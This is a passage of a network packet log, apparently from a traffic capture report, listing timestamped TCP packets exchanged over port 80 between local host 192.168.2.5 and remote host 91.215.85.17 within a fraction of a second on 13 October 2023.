Oct 13, 2023 15:20:57.248366117 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.248408079 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.248436928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.248476982 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.248508930 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.248547077 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.248564959 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.248614073 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.248645067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.248684883 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.248718023 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.248756886 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.248805046 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.248842955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.248845100 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.248881102 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.248903990 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.248944998 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.248972893 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.249011993 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.249028921 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.249068022 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.249080896 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.249119997 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.249146938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.249186993 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.249223948 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.249241114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.249263048 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.249281883 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.249322891 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.249361038 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.249414921 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.249454021 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.249473095 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.249515057 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.249557018 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.249597073 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.249602079 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.249649048 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.249680042 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.249715090 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.249747992 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.249778032 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.249784946 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.249819040 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.249862909 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.249901056 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.249944925 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.249984980 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.250017881 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.250047922 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.250056028 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.250091076 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.250138044 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.250175953 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.250178099 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.250207901 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.250212908 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.250252962 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.250287056 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.250324965 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.250344992 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.250382900 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.250394106 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.250443935 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.250475883 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.250514984 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.250534058 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.250570059 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.250571012 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.250607967 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.250618935 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.250658035 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.250685930 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.250727892 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.250755072 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.250771999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.250786066 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.250808001 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.250813961 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.250849962 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.250922918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.250992060 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.251024008 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.251024008 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.251039982 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.251077890 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.251121998 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.251158953 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.251158953 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.251195908 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.251228094 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.251257896 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.251266003 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.251302004 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.251337051 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.251353025 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.251425982 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.251455069 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.251455069 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.251491070 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.251523972 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.251566887 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.251687050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.251734972 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.251763105 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.251794100 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.251804113 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.251846075 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.251880884 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.251913071 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.251923084 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.251956940 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.251991987 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.252032042 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.252079010 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.252111912 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.252121925 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.252147913 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.252193928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.252240896 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.252353907 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.252407074 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.252424002 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.252469063 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.252481937 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.252538919 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.252574921 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.252616882 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.252635956 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.252676010 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.252736092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.252752066 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.252768040 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.252778053 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.252808094 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.252808094 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.252829075 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.252871037 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.252906084 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.252954006 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.252980947 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.253022909 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.253047943 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.253087044 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.253104925 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.253145933 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.253177881 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.253218889 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.253253937 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.253283024 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.253295898 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.253324986 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.253330946 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.253376007 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.253410101 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.253439903 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.253451109 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.253484964 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.253540039 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.253555059 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.253580093 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.253595114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.253597021 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.253633022 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.253667116 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.253696918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.253709078 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.253745079 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.253762960 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.253851891 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.253865957 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.253899097 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.253909111 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.253937006 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.253983974 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.254033089 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.254025936 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.254070044 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.254087925 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.254132032 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.254138947 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.254177094 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.254189968 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.254229069 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.254249096 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.254278898 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.254290104 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.254316092 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.254384995 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.254420996 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.254422903 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.254461050 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.254498959 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.254539967 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.254565954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.254606009 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.254658937 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.254690886 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.254695892 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.254731894 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.254766941 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.254811049 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.254844904 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.254884005 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.254920959 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.254962921 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.254997969 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.255037069 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.255037069 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.255085945 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.255122900 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.255166054 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.255182028 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.255218983 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.255264997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.255306005 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.255337954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.255378008 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.255403042 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.255440950 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.255446911 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.255485058 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.255511999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.255541086 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.255552053 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.255578041 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.255635977 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.255677938 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.255703926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.255744934 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.255767107 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.255806923 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.255842924 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.255884886 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.255930901 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.255973101 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.255997896 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.256037951 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.256108999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.256149054 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.256182909 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.256225109 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.256247997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.256289005 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.256321907 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.256365061 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.256397963 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.256438017 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.256472111 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.256510973 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.256571054 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.256611109 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.256629944 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.256659985 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.256669044 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.256697893 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.256720066 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.256761074 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.256783962 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.256825924 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.256858110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.256896973 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.256913900 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.256953955 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.256969929 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.257008076 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.257031918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.257061005 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.257070065 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.257101059 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.257128000 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.257180929 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.257185936 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.257219076 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.257231951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.257271051 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.257297039 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.257325888 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.257330894 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.257364988 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.257399082 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.257437944 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.257471085 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.257502079 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.257508993 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.257541895 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.257590055 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.257632971 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.257646084 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.257683992 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.257734060 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.257776022 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.257811069 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.257849932 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.257877111 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.257920027 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.257980108 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.257997036 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.258023024 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.258034945 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.258039951 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.258074999 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.258111954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.258151054 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.258188963 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.258228064 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.258248091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.258292913 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.258313894 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.258352041 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.258371115 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.258419037 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.258526087 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.258567095 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.258599997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.258629084 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.258637905 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.258668900 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.258671045 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.258713007 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.258747101 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.258789062 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.258824110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.258863926 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.258948088 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.258986950 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.258995056 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.259035110 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.259072065 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.259111881 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.259128094 CEST	80	49721	91.215.85.17	192.168.2.5
